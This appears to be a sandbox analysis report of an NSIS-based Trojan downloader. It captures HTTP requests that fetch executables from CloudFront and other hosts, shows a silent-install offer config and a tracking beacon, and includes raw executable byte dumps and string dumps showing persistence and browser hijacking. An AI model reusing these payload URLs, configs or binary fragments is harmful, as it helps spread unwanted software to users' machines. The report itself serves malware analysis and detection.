M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h..z.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$...&z...Si.....VW.T.....tO.q.3.;5.&z.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5.&z.r._^[...U..QQ.U.SV..i.
<<< skipped >>>
GET /7121923af824073a25b2b7e6ba0a6e0e.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: d1mdi78qyff344.cloudfront.net
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/x-msdownload
Content-Length: 58595
Connection: keep-alive
Date: Wed, 09 Dec 2015 22:28:08 GMT
Last-Modified: Wed, 09 Dec 2015 20:28:24 GMT
ETag: "a66865416d1330f1c571c12f4f8c2fea"
Accept-Ranges: bytes
Server: AmazonS3
Age: 41613
X-Cache: Hit from cloudfront
Via: 1.1 8f460f85e7788562e9f2e44d0aedb11b.cloudfront.net (CloudFront)
X-Amz-Cf-Id: wZX_L_EIjMsRp5H97nPRdzmv0gZK5VHBrULbLCc3Sxr95FlWrdhyIg==
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................^...........0.......p....@..........................................................................t.......................................................................................p...............................text...L\.......^.................. ..`.rdata.......p.......b..............@..@.data...X\...........v..............@....ndata...................................rsrc................z..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H....h.B..H.P.u..u..u...Hr@..B...SV.5p.B..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h`.B.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$....B...Si.....VW.T.....tO.q.3.;5..B.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5..B.r._^[...U..QQ.U.SV..i....
<<< skipped >>>
GET /OperaRUnew/Bundle_OperaRUnew.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: VVV.software-forus.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Thu, 24 Dec 2015 00:28:48 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1444112779"
Last-Modified: Tue, 06 Oct 2015 06:26:19 GMT
Cache-Control: max-age=27832
Content-Length: 116063
Content-Type: application/octet-stream
X-HW: 1450916928.dop010.fr7.t,1450916928.cds007.fr7.c
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1p.:u..iu..iu..i...iw..iu..i...i...id..i!2.i...i...it..iRichu..i........PE..L...d..K.................d..........^5............@..........................P.......................................................@..8............................................................................................................text....c.......d.................. ..`.rdata...............h..............@..@.data....p...........|..............@....ndata... ... ...........................rsrc...8....@......................@..@........................................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H......C..H.P.u..u..u...T.@..B...SV.5..C..E.WP.u...X.@..e...E..E.P.u...\.@..}..e....D.@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...H.@..E...E.P.E.P.u...`.@..u....E..9}...w....~X.te.v4..L.@....E.tU.}.j.W.E......E.......P.@..vXW..T.@..u..5X.@.W...E..E.h ...Pj.h..C.W..d.@..u.W...u....E.P.u...h.@._^3.[.....L$....C...Si.....VW.T.....tO.q.3.;5..C.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5..C.r._^[...U..QQ.U.SV..i....
<<< skipped >>>
GET hXXp://json.agewftkv.com/?adv_id=128&domain=AGEwfTkv.com&dotnet=4&event=2&file=installer&ip=52.1.45.42:80&pub_id=353&s=1&offer_version=1.8&dotnet=4&osver=5.1&lang=en&w64=0 HTTP/1.1
Host: json.agewftkv.com
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 24 Dec 2015 00:34:42 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
373..{ .."advID":128, .."primaryOfferInstallPath":"hXXps://d20ssor9owizgr.cloudfront.net/chromiuminstaller6/chromium-installer-sharp_dotnet4.exe", .."secondaryOfferInstallPath":"hXXps://d20ssor9owizgr.cloudfront.net/chromiuminstaller6/chromium-installer-sharp_dotnet4.exe", .."requireUnzip":false, .."requireSuccessInstallCheck":true, .."requireExitCodeCheck":false, .."successExitCode":0, .."constParams":"-pub_id=353 -fb -taskbar -ext=pcjnhdkacfipfoicilllfabpbghiegpn",.."mappedParams":[], .."requireRegKeysCheck":true, .."regKeysToCheck":[.."LocalMachine\\SOFTWARE\\Sakura\\gamegogle=*",."LocalMachine\\SOFTWARE\\Wow6432Node\\Sakura\\gamegogle=*"..], .."minutesToSleepBeforeInstall":0,.."preInstallRegCheck": true,.."preInstallRegKeys": [ ..."LocalMachine\\SOFTWARE\\Sakura\\gamegogle=*",."LocalMachine\\SOFTWARE\\Wow6432Node\\Sakura\\gamegogle=*"..],.."blockIfInstalled" : false.}...0..HTTP/1.1 200 OK..Server: nginx..Date: Thu, 24 Dec 2015 00:34:42 GMT..Content-Type: text/html; charset=UTF-8..Transfer-Encoding: chunked..Connection: keep-alive..373..{ .."advID":128, .."primaryOfferInstallPath":"hXXps://d20ssor9owizgr.cloudfront.net/chromiuminstaller6/chromium-installer-sharp_dotnet4.exe", .."secondaryOfferInstallPath":"hXXps://d20ssor9owizgr.cloudfront.net/chromiuminstaller6/chromium-installer-sharp_dotnet4.exe", .."requireUnzip":false, .."requireSuccessInstallCheck":true, .."requireExitCodeCheck":false, .."successExitCode":0, .."constParams":"-pub_id=353 -fb -taskbar -ext=pcjnhdkacfipfoicilllfabpbghiegpn",.."mappedPa
<<< skipped >>>
GET hXXp://events.agewftkv.com/?p=cHViX2lkPTM1MyZzZXR1cF9pZD0xJmV4dHJhX3BhcmFtcz1TaWxlbnRJbnN0YWxsZXIgZ2xvYmFsIHN0YXJ0JmV2ZW50PTExJnNpZD02NjYmbWFjPTc3NyZhZHZfaWQ9MTI4JmJpdmVyc2lvbj0xLjg= HTTP/1.1
Host: events.agewftkv.com
Proxy-Connection: Close
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 24 Dec 2015 00:34:41 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
0..
GET /SilentInstaller_dotnet4.exe HTTP/1.1
Host: d2u4zym7ey0920.cloudfront.net
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 321536
Connection: keep-alive
Date: Tue, 22 Dec 2015 12:43:01 GMT
Last-Modified: Tue, 22 Dec 2015 09:32:50 GMT
ETag: "a85df53ac3cdc0b948809c73b39b0571"
Accept-Ranges: bytes
Server: AmazonS3
Age: 42158
X-Cache: Hit from cloudfront
Via: 1.1 4919a7516ec7acdb985d9d24c36a649b.cloudfront.net (CloudFront)
X-Amz-Cf-Id: Ck257rROkJVx5Ros0xI9HVewGDQJh8hFl1C5WoDiTXNhxH9I0456Rw==
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....yV................................. ........@.. .......................@............@.................................`...K............................ ....................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................H.......h....X......p....o..@ ...........................................(....*..~....*...(....*Vs....(....t.........*....*...*..(h...&*2..(....&..Z*....0..........(......c.d(....&..(......*..2..(....&..Z*....0..........(......c.d(....&..(......*..2..(....&..Z*....0..........(......c.d(....&..(......*..2..(....&..Z*....0..........(......c.d(....&..(......*..2..(....&..Z*....0..........(......c.d(....&..(......*..2..(....&..Z*....0..........(......c.d(....&..(......*..2..(....&..Z*....0..........(......c.d(....&..(......*..2..(....&..Z*....0..........(......c.d(....&..(......*..2..(....&..Z*....0..........(......c.d(....&..(......*..2..(....&..Z*....0..........(......c.d(....&..(......*..2..(....&..Z*....0..........(......c.d(....&..(......*..2..(....&..Z*....0..........(......c.d(....&..(......*..2..(....&..Z*....0..........(......c.d(....&..(......*..2..( ...&..Z*....0..........(......c.d(!...&..(......*..2..("...&..Z*....0..........(......c.d(#...&..(......*..2..($...&..Z*....0..........(......c.d(%
<<< skipped >>>
Map
The Trojan connects to the servers at the folowing location(s):
Strings from Dumps
%original file name%.exe_1332:
.text
.text
`.rdata
`.rdata
@.data
@.data
.ndata
.ndata
.rsrc
.rsrc
uDSSh
uDSSh
.DEFAULT\Control Panel\International
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
GetWindowsDirectoryA
KERNEL32.dll
KERNEL32.dll
ExitWindowsEx
ExitWindowsEx
USER32.dll
USER32.dll
GDI32.dll
GDI32.dll
SHFileOperationA
SHFileOperationA
ShellExecuteA
ShellExecuteA
SHELL32.dll
SHELL32.dll
RegEnumKeyA
RegEnumKeyA
RegCreateKeyExA
RegCreateKeyExA
RegCloseKey
RegCloseKey
RegDeleteKeyA
RegDeleteKeyA
RegOpenKeyExA
RegOpenKeyExA
ADVAPI32.dll
ADVAPI32.dll
COMCTL32.dll
COMCTL32.dll
ole32.dll
ole32.dll
VERSION.dll
VERSION.dll
verifying installer: %d%%
verifying installer: %d%%
unpacking data: %d%%
unpacking data: %d%%
... %d%%
... %d%%
hXXp://nsis.sf.net/NSIS_Error
hXXp://nsis.sf.net/NSIS_Error
~nsu.tmp
~nsu.tmp
%u.%u%s%s
%u.%u%s%s
RegDeleteKeyExA
RegDeleteKeyExA
%s=%s
%s=%s
*?|/":
*?|/":
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsq2F.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsq2F.tmp
tc.dll
tc.dll
t_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://mobilitydata5.com/SysInfo/countup.php?sid=554655542&v=2\"}"}
t_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://mobilitydata5.com/SysInfo/countup.php?sid=554655542&v=2\"}"}
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsk3.tmp\inetc.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsk3.tmp\inetc.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsk3.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsk3.tmp
untup.php?sid=554655542
untup.php?sid=554655542
u.Uj@
u.Uj@
MSVCRT.dll
MSVCRT.dll
HttpSendRequestA
HttpSendRequestA
HttpSendRequestExA
HttpSendRequestExA
HttpQueryInfoA
HttpQueryInfoA
FtpCreateDirectoryA
FtpCreateDirectoryA
FtpOpenFileA
FtpOpenFileA
HttpOpenRequestA
HttpOpenRequestA
HttpAddRequestHeadersA
HttpAddRequestHeadersA
HttpEndRequestA
HttpEndRequestA
InternetCrackUrlA
InternetCrackUrlA
WININET.dll
WININET.dll
inetc.dll
inetc.dll
Open URL Error
Open URL Error
URL Parts Error
URL Parts Error
FtpCreateDir failed (550)
FtpCreateDir failed (550)
Error FTP path (550)
Error FTP path (550)
Downloading %s
Downloading %s
%dkB (%d%%) of %dkB @ %d.dkB/s
%dkB (%d%%) of %dkB @ %d.dkB/s
(%d %s%s remaining)
(%d %s%s remaining)
REST %d
REST %d
SIZE %s
SIZE %s
Content-Length: %d
Content-Length: %d
Content-Type: application/x-www-form-urlencoded
Content-Type: application/x-www-form-urlencoded
Authorization: basic %s
Authorization: basic %s
Proxy-authorization: basic %s
Proxy-authorization: basic %s
%s:%s
%s:%s
FtpCommandA
FtpCommandA
wininet.dll
wininet.dll
%u MB
%u MB
%u kB
%u kB
%u bytes
%u bytes
%d:d:d
%d:d:d
%s - %s
%s - %s
(Err=%d)
(Err=%d)
NSIS_Inetc (Mozilla)
NSIS_Inetc (Mozilla)
Filename: %s
Filename: %s
/password
/password
Uploading %s
Uploading %s
8!8-8B8I8}8
8!8-8B8I8}8
.reloc
.reloc
System.dll
System.dll
callback%d
callback%d
@.reloc
@.reloc
BB%X3
BB%X3
.Kp9s
.Kp9s
}/\a%u;
}/\a%u;
%2S$
%2S$
z|.uO
z|.uO
.PX;:
.PX;:
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nss30.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nss30.tmp
nss30.tmp
nss30.tmp
UME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsq2F.tmp
UME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsq2F.tmp
//livestatscounter.com/Generic/vos.php?ch=
//livestatscounter.com/Generic/vos.php?ch=
3a604241f2bb41d3ee1064890c23e1.exe
3a604241f2bb41d3ee1064890c23e1.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsq2F.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsq2F.tmp
n.php?r=vu_vo2_
n.php?r=vu_vo2_
d2fpsq9kg43yka.cloudfront.net/cmmdWriter.exe
d2fpsq9kg43yka.cloudfront.net/cmmdWriter.exe
c:\%original file name%.exe
c:\%original file name%.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp
%original file name%.exe
%original file name%.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsp1.tmp
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsp1.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
1938953175.us-east-1.elb.amazonaws.com
1938953175.us-east-1.elb.amazonaws.com
{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://mobilitydata5.com/SysInfo/countup.php?sid=554655542&v=2\"}"}
{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://mobilitydata5.com/SysInfo/countup.php?sid=554655542&v=2\"}"}
hXXp://ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
hXXp://ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
url=hXXp://mobilitydata5.com/SysInfo/countup.php?sid=554655542
url=hXXp://mobilitydata5.com/SysInfo/countup.php?sid=554655542
hXXp://mobilitydata5.com/SysInfo/countup.php?sid=554655542
hXXp://mobilitydata5.com/SysInfo/countup.php?sid=554655542
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsw6.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsw6.tmp
dlgen.php?r=vu_vo2_
dlgen.php?r=vu_vo2_
Nullsoft Install System v2.46
Nullsoft Install System v2.46
nst16.tmp_264:
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
@.reloc
@.reloc
xSSSh
xSSSh
FTPjKS
FTPjKS
FtPj;S
FtPj;S
C.PjRV
C.PjRV
Visual C CRT: Not enough memory to complete call to strerror.
Visual C CRT: Not enough memory to complete call to strerror.
Broken pipe
Broken pipe
Inappropriate I/O control operation
Inappropriate I/O control operation
Operation not permitted
Operation not permitted
portuguese-brazilian
portuguese-brazilian
operator
operator
GetProcessWindowStation
GetProcessWindowStation
KERNEL32.dll
KERNEL32.dll
USER32.dll
USER32.dll
GetCPInfo
GetCPInfo
GetProcessHeap
GetProcessHeap
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nst16.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nst16.tmp
7*8084888
7*8084888
0%1u1
0%1u1
0 0$0(0,00040`1|1
0 0$0(0,00040`1|1
nKERNEL32.DLL
nKERNEL32.DLL
mscoree.dll
mscoree.dll
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- CRT not initialized
- floating point support not loaded
- floating point support not loaded
WUSER32.DLL
WUSER32.DLL
AGEwfTkv.com
AGEwfTkv.com
52.1.45.42:80
52.1.45.42:80
ppt.exe_1788:
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
__MSVCRT_HEAP_SELECT
__MSVCRT_HEAP_SELECT
user32.dll
user32.dll
KERNEL32.dll
KERNEL32.dll
EnumWindows
EnumWindows
USER32.dll
USER32.dll
RegCloseKey
RegCloseKey
RegCreateKeyW
RegCreateKeyW
RegOpenKeyW
RegOpenKeyW
RegDeleteKeyW
RegDeleteKeyW
RegDeleteKeyA
RegDeleteKeyA
ADVAPI32.dll
ADVAPI32.dll
ShellExecuteW
ShellExecuteW
SHELL32.dll
SHELL32.dll
COMCTL32.dll
COMCTL32.dll
GetCPInfo
GetCPInfo
%s\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\9158
%s\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\9158
%s\Microsoft\Internet Explorer\Quick Launch\9158
%s\Microsoft\Internet Explorer\Quick Launch\9158
%s\9158
%s\9158
%s\%s
%s\%s
%s\*.*
%s\*.*
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\9158
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\9158
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{B5C48CDD-6C11-453D-91B4-59CFCE233D27}
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{B5C48CDD-6C11-453D-91B4-59CFCE233D27}
%Program Files%\baidu\ppt.exe
%Program Files%\baidu\ppt.exe
%s\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\
%s\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\
%s\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\2345
%s\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\2345
%s\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\
%s\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\
%s\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\QQ
%s\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\QQ
%s\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\2345
%s\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\2345
%s\Microsoft\Internet Explorer\Quick Launch\
%s\Microsoft\Internet Explorer\Quick Launch\
$.xlkkvd
$.xlkkvd
%s\My Box.lnk
%s\My Box.lnk
%s\QQ
%s\QQ
%s\2345
%s\2345
k%s\9158
k%s\9158
$.qmgc
$.qmgc
%s\My Box
%s\My Box
%s\PPT
%s\PPT
%s\Rising Antivirus
%s\Rising Antivirus
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
bf.desktop.bootpage.BootPage2
bf.desktop.bootpage.BootPage2
%s\ElTaces.exe
%s\ElTaces.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\wenguanjia
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\wenguanjia
%s\unins000.exe
%s\unins000.exe
%s\wenguanjia
%s\wenguanjia
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\%s
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\%s
Software\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\{1A3BD145-3384-4F81-9F6C-10F045887FD3}
Software\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\{1A3BD145-3384-4F81-9F6C-10F045887FD3}
CLSID\{1A3BD145-3384-4F81-9F6C-10F045887FD3}
CLSID\{1A3BD145-3384-4F81-9F6C-10F045887FD3}
Software\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\{CF3CDEFB-31BE-43AE-B064-B9C62C883259}
Software\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\{CF3CDEFB-31BE-43AE-B064-B9C62C883259}
CLSID\{CF3CDEFB-31BE-43AE-B064-B9C62C883259}
CLSID\{CF3CDEFB-31BE-43AE-B064-B9C62C883259}
Software\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\{33A895C1-4269-466F-9B01-0C8AEFB64AC3}
Software\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\{33A895C1-4269-466F-9B01-0C8AEFB64AC3}
CLSID\{33A895C1-4269-466F-9B01-0C8AEFB64AC3}
CLSID\{33A895C1-4269-466F-9B01-0C8AEFB64AC3}
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{96F04C1B-E352-4A90-BED4-11A0FA968BC1}_is1
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{96F04C1B-E352-4A90-BED4-11A0FA968BC1}_is1
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\RAV
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\RAV
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\RZC
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\RZC
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\RSD
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\RSD
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\QQPCMgr
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\QQPCMgr
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\BaiduPinyin
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\BaiduPinyin
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\2345Explorer
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\2345Explorer
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\2345chrome
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\2345chrome
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\PPStream
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\PPStream
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IQIYI Video
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IQIYI Video
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\GeePlayer
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\GeePlayer
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\QQBrowser
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\QQBrowser
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\LiveRoom
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\LiveRoom
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\bfAppEngine
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\bfAppEngine
Software\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice
Software\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice
qqbrowser.exe
qqbrowser.exe
http\shell\open\command
http\shell\open\command
%s\Internet Explorer\iexplore.exe
%s\Internet Explorer\iexplore.exe
VVV.taobao.com
VVV.taobao.com
%s\Tencent\QQBrowser\qqbrowser.exe
%s\Tencent\QQBrowser\qqbrowser.exe
kernel32.dll
kernel32.dll
Bind.exe_776:
.text
.text
`.rdata
`.rdata
@.data
@.data
__MSVCRT_HEAP_SELECT
__MSVCRT_HEAP_SELECT
user32.dll
user32.dll
KERNEL32.dll
KERNEL32.dll
USER32.dll
USER32.dll
ShellExecuteA
ShellExecuteA
SHELL32.dll
SHELL32.dll
HttpQueryInfoA
HttpQueryInfoA
InternetOpenUrlA
InternetOpenUrlA
WININET.dll
WININET.dll
GetCPInfo
GetCPInfo
GET%sHTTP/1.1
GET%sHTTP/1.1
Range: bytes=%d-
Range: bytes=%d-
%Program Files%\baidu\Bind.exe
%Program Files%\baidu\Bind.exe
nst2B.tmp_2416:
.text
.text
`.rdata
`.rdata
@.data
@.data
.ndata
.ndata
.rsrc
.rsrc
uDSSh
uDSSh
.DEFAULT\Control Panel\International
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
GetWindowsDirectoryA
KERNEL32.dll
KERNEL32.dll
ExitWindowsEx
ExitWindowsEx
USER32.dll
USER32.dll
GDI32.dll
GDI32.dll
SHFileOperationA
SHFileOperationA
ShellExecuteA
ShellExecuteA
SHELL32.dll
SHELL32.dll
RegEnumKeyA
RegEnumKeyA
RegCreateKeyExA
RegCreateKeyExA
RegCloseKey
RegCloseKey
RegDeleteKeyA
RegDeleteKeyA
RegOpenKeyExA
RegOpenKeyExA
ADVAPI32.dll
ADVAPI32.dll
COMCTL32.dll
COMCTL32.dll
ole32.dll
ole32.dll
VERSION.dll
VERSION.dll
verifying installer: %d%%
verifying installer: %d%%
hXXp://nsis.sf.net/NSIS_Error
hXXp://nsis.sf.net/NSIS_Error
... %d%%
... %d%%
~nsu.tmp
~nsu.tmp
%u.%u%s%s
%u.%u%s%s
RegDeleteKeyExA
RegDeleteKeyExA
%s=%s
%s=%s
*?|/":
*?|/":
\System.dll
\System.dll
\nsExec.dll
\nsExec.dll
\inetc.dll
\inetc.dll
$$\wininit.ini
$$\wininit.ini
%Program Files%
%Program Files%
q.ot[
q.ot[
g.ZO||k[
g.ZO||k[
^2S%S
^2S%S
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nst2B.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nst2B.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp
nst2B.tmp
nst2B.tmp
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsw2D.tmp
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsw2D.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nst2B.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nst2B.tmp
Nullsoft Install System v2.46
Nullsoft Install System v2.46